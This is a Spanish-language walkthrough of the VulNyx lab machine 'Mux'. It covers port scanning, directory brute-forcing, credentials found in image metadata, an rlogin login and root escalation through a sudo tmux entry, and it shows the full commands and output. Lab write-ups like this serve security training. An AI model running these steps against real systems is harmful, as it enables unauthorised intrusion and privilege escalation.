VulNyx - Mux
Information
Mux es una máquina virtual vulnerable Linux de dificultad baja de la plataforma VulNyx, fue creada por el usuario d4t4s3c y funciona correctamente en los hipervisores VirtualBox y VMware.
Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-01 20:04 CEST
Nmap scan report for 192.168.1.80
Host is up (0.00036s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
512/tcp open exec
513/tcp open login
514/tcp open shell
❯ nmap -sVC -p80,512,513,514 192.168.1.80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-01 20:11 CEST
Nmap scan report for 192.168.1.80
Host is up (0.00073s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-title: Monna Lisa
|_http-server-header: Apache/2.4.56 (Debian)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
Shell (lisa)
80/TCP (HTTP)
Site
Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.80/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.80/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 277]
Progress: 220546 / 220547 (100.00%)
===============================================================
Finished
===============================================================
Stego
Descargo y analizo los metadatos de la imagen con strings y encuentro unas credenciales
❯ wget -q "http://192.168.1.80/image.jpg"
❯ strings image.jpg -n 10
"x|+;"Lj2!4
^kD<;4dQeDGa
(bEFo0(gs|
1U:HAvm,n
#zAShuj7`1
4phV1&Qcd_
|"sBI,g# k([B
S^W9,S#6]K
{aidWDq#&bf
2fNPJ]H6Wn
QW>k0V:}GO}
<M) VOT}W'
b #+ rI-eGn
#p~-gl_;,a
UGr3RWgM,2
E[t7Clce|`6
lisa:Gi0c0nd@
513/TCP (RLOGIN)
Accedo al sistema como usuario lisa con las credenciales obtenidas
# apt install -y rsh-redone-client
❯ rlogin 192.168.1.80 -l lisa
Password:
lisa@mux:~$ id ; hostname
uid=1000(lisa) gid=1000(lisa) grupos=1000(lisa)
mux
Privilege Escalation
Enumeration
Sudo
El usuario lisa puede ejecutar como root el binario tmux con sudo
lisa@mux:~$ sudo -l
Matching Defaults entries for lisa on mux:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User lisa may run the following commands on mux:
(root) NOPASSWD: /usr/bin/tmux
Abuse
Me convierto en usuario root abusando de privilegio
lisa@mux:~$ sudo -u root /usr/bin/tmux
root@mux:/home/lisa# id ; hostname
uid=0(root) gid=0(root) grupos=0(root)
mux
Flags
Ya como usuario root puedo leer las flags user.txt y root.txt
root@mux:/home/lisa# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
bcb44***************************
be203***************************
Hasta aquí la resolución de la máquina Mux.
Happy Hacking!